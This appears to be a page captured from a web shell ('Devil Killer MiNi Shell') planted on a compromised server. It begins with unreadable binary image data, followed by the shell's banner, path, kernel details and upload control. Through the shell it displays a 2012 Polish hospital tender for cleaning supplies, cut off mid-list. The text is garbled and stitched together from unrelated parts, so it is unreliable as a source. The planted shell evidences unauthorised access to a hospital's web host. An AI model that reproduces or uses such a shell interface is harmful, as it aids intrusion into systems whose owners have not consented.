JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120601/183320-N-2012.html

<p class="kh_header"><b>Sosnowiec: Dostawa środków czystości, artykułów gospodarczych i worków foliowych</b><br>
<b>Numer ogłoszenia: 183320 - 2012; data zamieszczenia: 01.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 32 41 30 111, faks 32 41 30 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości, artykułów gospodarczych i worków foliowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1-  środki do mycia i czyszczenia,
Pakiet nr 2 - preparaty do mycia, dezynfekcji i czyszczenia,
Pakiet nr 3 - środki i płyny do mycia i płukania,
Pakiet nr 4 - środki czystości różne
Pakiet nr 5 - artykuły gospodarcze, 
Pakiet nr 6 - mopy, 
Pakiet nr 7 - artykuły gospodarcze
Pakiet nr 8 - ręczniki papierowe i papier toaletowy,
Pakiet nr 9 - worki foliowe.
Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach 4.1 - 4.9 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8, 39.80.00.00-0, 39.22.40.00-8, 33.76.00.00-5, 19.64.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-  próbki oferowanego asortymentu  (Dotyczy Pakietu nr 6,  Pakietu nr 7 poz. 2),
-  dokument potwierdzający ilość cykli prania ( Dotyczy Pakietu nr 6),
- karty charakterystyki (do asortymentu oznaczonego * w formularzu asortymentowo-   cenowym - zał. nr 4 do SIWZ), 
 - etykiety i instrukcje używania w języku polskim wraz z pierwszą dostawą, 
 - dla wyrobów medycznych: deklaracje zgodności CE lub certyfikat CE (dotyczy Pakietu 3 poz. 3, 4); 
 - dla produktów biobójczych: pozwolenie na obrót produktów biobójczych wydane przez MZ (dotyczy Pakietu 2 poz.2);</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-  formularz ofertowy  wg wzoru stanowiącego załącznik nr 1 do SIWZ.
- formularz asortymentowo-cenowy wg wzoru stanowiącego załącznik nr 4.1÷ 4.9 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wartość umowy może ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT lub w przypadku korzystnych zmian cenowych dla Zamawiającego.
2. Wynagrodzenie należne Wykonawcy podlega automatycznej waloryzacji (bez obowiązku wprowadzenia aneksem) odpowiednio o kwotę podatku VAT, wynikającą ze stawki tego podatku, obowiązującą w chwili powstania obowiązku podatkowego. 
3. Ceny brutto wynikające ze zmiany obowiązującej stawki VAT  ulegną zmianie, przy zachowaniu cen netto podanych w ofercie.
4. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie asortymentu objętego umową, asortymentem równoważnym w przypadku:
a) zaprzestania wytwarzania asortymentu objętego umową, 
b) wygaśnięcia pozwolenia dopuszczającego do obrotu,
 c) zmiany numeru katalogowego produktu,
  d) zmiana nazwy handlowej produktu,
  e) zmiana producenta,
f) w sytuacji gdy zostanie wprowadzony do sprzedaży przez Producenta zmodyfikowany/udoskonalony produkt powodując wycofanie dotychczasowego, lub nastąpi przerwa w produkcji albo wycofanie produktu z rynku.
4.1. W wyjątkowych sytuacjach opisanych w pkt. a-f pkt.4 Wykonawca będzie zobowiązany dostarczyć asortyment w cenie nie wyższej niż cena asortymentu oferowanego.
4.2. Powyższe zmiany nie mogą skutkować zwiększeniem wartości umowy, podwyższeniem  cen jednostkowych i być niekorzystne dla Zamawiającego.
4.3. Obniżenie cen jednostkowych i wartości umowy jest dopuszczalne.
5. Zmiana, o której mowa w ust. 4 będzie dopuszczona za zgodą Zamawiającego, pod warunkiem, iż asortyment równoważny będzie oparty na tych samych  właściwościach i parametrach użytkowych, co asortyment objęty umową i przy cenie nie wyższej niż cena asortymentu objętego umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl zakładka zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Dziale Zamówień Publicznych i Zawierania Umów Samodzielnego Publicznego Szpitala Miejskiego, 41-219 Sosnowiec, ul. Szpitalna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 10:00, miejsce: w Samodzielnym Publicznym Szpitalu Miejskim w Sosnowcu, 41-219 Sosnowiec, ul. Szpitalna 1, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1	  środki myjąco-czyszczące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.*	Środek myjąco-pielęgnujący do mycia podłóg, w tym podłóg zabezpieczonych akrylami. Skład: poniżej 5% niejonowe środki powierzchniowo-czynne, 5-15% anionowe środki powierzchniowo-czynne, 5-10% alkohole sulfonowane, 2-5% etoksylowany alkohol tłuszczowy, ph 8,5 koncentrat, stężenie roztworu roboczego 0,1%, wydajność 1 litra koncentratu 1000 litrów roztworu roboczego, op.= 1l	op.	275
2.*	Środek czyszczący do wszystkich powierzchni zmywalnych (glazura, meble, powierzchnie laminowane) w tym do powierzchni błyszczących (szyby,lustra, przeszklenia). Skład: poniżej 5% anionowe środki anionowo-czynne, 15-30% niejonowe środki powierzchniowo-czynne,10-20% alkohol izopropylowy, pf 5,5 do 6,5 koncentrat, stężenie roztworu roboczego 0,1%, wydajność 1 litra koncentratu 1000 litrów roztworu roboczego, op=1l	op.	300
3.*	Środek czyszczący do urządzeń sanitarnych. Skład: 5-15% niejonowe środki powierzchniowo-czynne, 10-20% kwas amidosiarkowy, 10-20% etoksylowany alkohol tłuszczowy, ph 1,1 koncentrat, stężenie roztworu roboczego 0,1%, wydajność 1 litra koncentratu 1000 litrów roztworu roboczego, op=1l	op.	200
Zamawiający wymaga, by każdy preparat lub oznakowanie opakowania było w innym kolorze. Dopuszcza się inną ilość w opakowaniu niż wskazana przez Zamawiającego z odpowiednim przeliczeniem zamawianych ilości przy czym op. nie może przekraczać 5l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2	 środki myjąco-czyszczące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Skoncentrowany preparat myjący w postaci cieczy, skuteczny w usuwaniu różnorodnych zanieczyszczeń z urządzeń, ścian, podłóg pomieszczeń. Nie zawiera fosforanów, bezpieczny dla środowiska, mający zastosowanie w przemyśle spożywczym. Wymagane opakowania o pojemności 22kg. Preparat o pH (1% roztworu) 12,6 oraz gęstości (20 st.C) 1,07g/cm3. Stosuje się w stężeniach od 0,2 -2%. Zawiera w swoim składzie sól sodową EDTA (5-15%), niejonowe środki powierzchniowo czynne (alkohol (C13) etoksylowany (8-9EO)) (<5%), 2-(2-butoksyetoksy) etanol (<5%). Preparat dozowany przez system typu hydrosystem. Op. = 22 kg 	op.	4
2	Stężony preparat dezynfekcyjno-myjący, przeznaczony do dezynfekcji powierzchni i urządzeń w miejscach przygotowania i spożywania posiłków. Zawiera kationowe środki powierzchniowo czynne (chlorek dimetyloformamidy) <5%, związki neutralizujące twardość wody, związki powierzchniowo czynne, związki lekko alkaliczne oraz kationowe związki dezynfekcyjne o szerokim spektrum skuteczności bakteriobójczej. Postać: przeźroczysta ciecz, pH (koncentrat, w 20st.C): ok. 7,3: gęstość w 20st.C: ok.1,0g/cm3. Dozowanie 60ml/8l wody. Preparat dozowany przez system typu hydrosystem. Op.= 20l	op.	2
3	Automatyczne urządzenie z 25m wężem umożliwiające dozowanie 2 produktów (z poz. 1 i poz. 2) z dostarczonych opakowań, typu hydrosystem                                                                                	szt.	1
4	Skoncentrowany preparat myjąco-dezynfekujący, przeznaczony do mycia i dezynfekcji powierzchni i urządzeń w miejscach przygotowywania i spożywania posiłków. Posiada właściwości bakteriobójcze i grzybobójcze. Płyn barwy fioletowej, o pH koncentratu 10-11 oraz gęstości 1,035g/m3 w plastikowej saszetce o pojemności 1,5l. Preparat zawiera w swoim składzie niejonowe środki powierzchniowo-czynne (alkohol (C13) etoksylowany (8-9EO)) (5-15%), kationowe środki powierzchniowo czynne (chlorek didecylodimetyloamoniowy) (<5%), kationowe środki powierzchniowo czynne (czwartorzędowe środki amoniowe, benzyl-C12-16-alkildimetyl,chlorki) (<5%), niejonowe środki powierzchniowo czynne (alkohol (C13), etoksylowany (3EO)) (<5%), propan-2-ol, izopropanol, alkohol izopropylowy (<5%), węglan sodu, węglan disodu (<5%) oraz substancje dezynfekujące. Preparat dozowany przez dozownik Divermite S. Op=1,5l	op.	1
5	Urządzenie Divermite S umożliwiające dozowanie 15ml preparatu z 1,5l saszetki                            	szt.	1
6	Skoncentrowany preparat do ręcznego mycia naczyń, skuteczny przy usuwaniu wszelkiego rodzaju zabrudzeń z powierzchni zmywalnych, łatwo usuwa tłuszcz i zaschnięte resztki jedzenia, łatwy w spłukiwaniu, skład: anionowe związki powierzchniowo czynne, konserwanty, związki zapachowe. Związki zawarte w preparacie ulegaja biodegradacji, kolor zielony, delikatny dla skóry rąk, pH koncentratu zbliżone do pH skóry ok. 5,2. Ekonomiczny: dozowanie: 1 doza (ok.20ml) preparatu na 10-20l.roztworu. Op=20l	op.	8
7	Urządzenie dozujące typu pompa automatyczna	Szt.	1
8	Alkaliczny preparat w postaci płynu o brązowej barwie do czyszczenia piekarników i frytownic, usuwa zwęglone osady i tłuszcze. Płyn o pH 13,0 i gstości 1,12g/cm3, w swoim składzie zawiera wodorotlenek sodu (5-15%), eter 2-metylowy propanolu (<5%), niejonowe związki powierzchniowo czynne (poliglukozyd alkilowy) (<5%). Preparat działa w temperaturze 60-80 st.C Op= 2l	op.	4
9	Preparat przeznaczony do czyszczenia, polerowania i konserwacji powierzchni pionowych wykonanych ze stali nierdzewnej. Preparat nadaje się do czyszczenia zabrudzeń tłuszczowych, zostawia warstwę ochronną na powierzchniach, nadaje połysk. Biale mleczko o pH 6-8 gęstości 0,94g/cm3, w swoim składzie zawiera węglowodory alifatyczne (>30%), niejonowe środki powierzchniowo czynne (alkohol alkilowy etoksylowany) (<5%) Dimethylol Glykol, Methylchloroisothiazolinone. Op=750ml	op.	4
Dopuszcza się inną ilość w opakowaniu niż wskazana przez Zamawiającego z odpowiednim przeliczeniem zamawianych ilości przy czym op. nie może przekraczać 20l, 22kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8, 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3	 środki i płyny do mycia i płukania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.*	Płyn myjący do zmywarek. Specjalny środek czyszczący do słabo zabrudzonych naczyń oraz naczyń ze szkła i porcelany. 
Dozowanie: automatycznie 1,5*-2 ml na 1 l wody                                    *przy wodzie o max. twardości 5° dH
Właściwości: gęstość (20st.C): 1,2g/cm3  , wartość pH (20st.C): ok.14,  lepkość (20st.C); <10mPa s, zawartość LZO: <30%, rozpuszcza się w wodzie. Op =12 kg. Typu F-420	op.	24
2.*	Płynny środek nabłyszczający do zmywarek wyłącznie do użytku profesjonalnego. Skład: kwas cytrynowy 5-10%, niejonowy środek powierzchniowo czynny  5-15%, kwas glikolowy 1-5%. Właściwości: gęstość (20st.C): 1,05g/cm3 , wartość pH (20st.C): 1,9 , lepkość (20st.C) <10mPas, ciecz bezbarwna op=12kg. Typu Klarsplurer N - koncentrat	op.	12
3.*	Środek myjący do myjni firmy Getinge 1200 typu GD Wash lub kompatybilny, w opakowaniach 5l, dopuszczony do użycia w wymienionej myjni - nie powodujący utraty gwarancji, z terminem gwarancji 12 miesięcy od daty zakupu. 
W PRZYPADKU ZMIANY PREPARATÓW KOSZT KALIBRACJI I TESTOWANIA MYJNI PONOSI WYKONAWCA.	op.	48
4.*	Środek płuczący i odkamieniający do myjni firmy Getinge 1200 typu GD Flush lub kompatybilny, w opakowaniach 5l, dopuszczony do użycia w wymienionej myjni - nie powodujący utraty gwarancji, z terminem gwarancji 12 miesięcy od daty zakupu.
W PRZYPADKU ZMIANY PREPARATÓW KOSZT KALIBRACJI I TESTOWANIA MYJNI PONOSI WYKONAWCA.	op.	48
5.*	Płyn do płukania oraz wiązania twardości wody w myjniach naczyń sanitarnych z dezynfekcją parową basenów, kaczek itp. Właściwości: płyn jest lekko kwaśnym środkiem płuczącym ze specjalnymi składnikami zmiękczającymi. Dzięki dobrym właściwościom wiązania wapnia i nawilżania nie pozostawia plam wodnych i osadów wapiennych na przedmiotach.Składniki: <5% polikarboksylany, środki konserwujące (metylochloroisotiazolinon/metylisotiazolinon. Dane techniczne: gęstość (20st.C); 1,1g/cm3 , wartośC pH (20st.C w wodzie zdemineralizowanej); 0,5-1,5ml/l:3,7-3,0 , lepkość (koncentrat 20st.C) <50 mPas op=5l. Typu np. Neodisher SBK	op.	84
Dopuszcza się inną ilość w opakowaniu niż wskazana przez Zamawiającego z odpowiednim przeliczeniem zamawianych ilości przy czym op. nie może przekraczać 5l, 12kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4 środki czystości różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Płyn do mycia naczyń usuwający tłuszcz, łagodny dla skóry rąk, posiadający atest PZH, wydajność: 1 łyżeczka na 5l wody, op= 5l.	szt.	684
2.	Proszek do zmywarek w granulkach op=1kg	szt.	150
3.	Mydło w płynie o pH równym 5,5 posiadające atest PZH op=5l.	szt.	684
4.	Pasta BHP ścierna  500g	szt.	54
5.	Szampon do włosów op=1l	szt.	18
6.	Płyn do mycia powierzchni chromowanej 0,5l 	op.	108
7.	Proszek czyszczący do kotłów, garnków, zlewów, stołów nierdzewnych 1kg	szt.	300
8.	Płyn czyszcząco-dezynfekujący, przeznaczony do różnorodnego zastosowania, różowy, typu Lizo op=1l	szt.	200
9.	Preparat do udrażniania rur i kanalizacji 0,5kg granulat 	szt.	24
10.	Mleczko do mycia sanitariatów, usuwające brud, plamy i tłuszcz, nie rysujące powierzchni op= 0,5l	szt.	720
11.	Maszynki do golenia jednorazowego użytku	szt.	360
Dopuszcza się inną ilość w opakowaniu niż wskazana przez Zamawiającego z odpowiednim przeliczeniem zamawianych ilości przy czym op. nie może przekraczać 5l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5 artykuły gospodarcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rękawice gospodarcze gumowe, posiadające atest PZH	para	600
2.	Rękawice kuchenne bawełniane, ochronne, jednopalczaste	para	55
3.	Szczotki do szorowania w drewnianej oprawie +styl	szt.	18
4.	Szczotki do zamiatania w drewnianej oprawie+styl 	szt.	18
